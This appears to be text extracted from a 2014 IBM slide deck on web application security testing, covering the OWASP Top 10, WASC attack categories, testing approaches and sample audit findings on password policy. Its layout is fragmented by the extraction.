Académique Documents
Professionnel Documents
Culture Documents
Application Backend
Firewall
servers server
Databases
Web servers
% of attacks % of dollars
Web
10%
applications
75% 90%
Network
25% server
• Identity theft
Hacker impersonates a trusted user
• Remote execution
Execute arbitrary code on the server
External security
Internal tactical
Cost
per
application
tested Strategic
operationalized
Application coverage
Injection Flaws Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a
command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing
data without proper authorization.
Broken Authentication and Application functions related to authentication and session management are often not implemented correctly, allowing
attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other
Session Management
users’ identities.
Cross-Site Scripting (XSS) XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or
escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites,
or redirect the user to malicious sites.
Insecure Direct Object Reference A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file,
directory, or database key. Without an access control check or other protection, attackers can manipulate these references
to access unauthorized data.
Security Misconfiguration Good security requires having a secure configuration defined and deployed for the application, frameworks, application
server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as
defaults are often insecure. Additionally, software should be kept up to date.
Sensitive Data Exposure Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials.
Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes.
Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when
exchanged with the browser.
Missing Function Level Access Most web applications verify function level access rights before making that functionality visible in the UI. However,
Control applications need to perform the same access control checks on the server when each function is accessed. If requests are
not verified, attackers will be able to forge requests in order to access functionality without proper authorization.
Cross-site Request Forgery A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie
(CSRF) and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to
force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
Using Components with Known Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a
Vulnerabilities vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using
components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and
impacts.
Unvalidated Redirects and Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine
the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards
Forwards
to access unauthorized pages. IBM Corporation 2014
© Copyright
WASC
• Web Application Security Consortium (WASC)
Their purpose is to develop, adopt, and advocate standards for Web application
security
• Authorization
Attacks that target a Web site's method of determining if a user, service, or application has
the necessary permissions to perform a requested action
• Client-side attacks
Attacks that abuse or exploit a Web site user's system
• Command execution
Attacks designed to execute remote commands on the Web site
• Information disclosure
Attacks designed to acquire system specific information about a Web site
• Logical Attacks
Attacks that abuse or exploit a Web application's logic flow
20 % Vulns
15 % Sites
9 10.24
10 7.85 8
5
0
Cross-site Information SQL Predictable
scripting leakage injection resource
location
Data from: http://www.webappsec.org/projects/statistics/
© Copyright IBM Corporation 2014
Types of Security Test Assignments
There are distinct testing techniques that can be used for Security tests;
Black Box Testing
No information provided about the target
White Box Testing
Information about the target is provided to assist the test
Including logon details and in some cases code
Traditionally used if Functional & Unit test cycles
Grey Box Testing
Mixture of Black & White Box
Provides the most detailed analysis of the target
Dynamic Analysis Static Analysis
Schedule Retest
Define Roles
Close Assignment
Approve Test
Target Application
Parameter Tampering Modifying parameters which form part of the URL or hidden HTML form tags
A Forced Parameter Tampering with debug and test flags within the passed code to change nature of application
Cross Site Scripting The injection of script into unsanitised input fields (can lead to “Phishing” attacks)
SQL Injection The act of passing SQL code into unsanitised input fields
Buffer Overflow Sending too much data into a buffer (causes an overflow - may execute the ‘extra’ data)
Direct Access Browsing Browsing directly to directories on the server (bypassing any authentication)
Directory Traversal Traversing up the web servers directory structure in order to gain access to the web root
Form Manipulation Exploiting credentials that are passed in plain text within the HTTP POST request
Information Disclosure
Returning unnecessary system and database information which can aid an attack
Database Configuration
Phishing Attacks Issues
Recommend : The cover letter function should employ full input control
preventing or sanitizing the use of special characters.
Further the email selection should be limited to validated email accounts, thus
preventing the SPAM potential
© Copyright IBM Corporation 2014
Password Policy Control – MEDIUM (5.5/10)
Requirement Result Explanation
Username at least 8 chars Passed Password policy forces at least 8 characters
Username and Password can not Failed Possible to make these match by changing the
match Userid. Doing this forces a password change.
Enforce Password History Failed Changed password to same value several
times. Likely a business decision to allow this.
Maximum Password Age NR Not enough time to test
Account locked out after 3 Failed Account was locked out after 11 unsuccessful
unsuccessful login attempts attempts. Not best practice
Passwords must meet Complexity Requirements:
- at least 8 characters Passed Password enforced to 8 chars only
- english upper case (A-Z) Passed Password forced mixed characters & numerics
- english lower case (a-z) Passed Password forced mixed characters & numerics
- base 10 digits (0-9) Passed Password forced mixed characters & numerics
- non-alphanumeric (e.g. $,!) Passed Password forced mixed characters & numerics
Recommend:
PCI Standards require that the Personal Account Number (PAN), at minimum be
rendered unreadable anywhere it is stored by using any of the following
approaches:
Strong one-way hash functions (hashed indexes)
Truncation
Index tokens and pads (pads must be securely stored)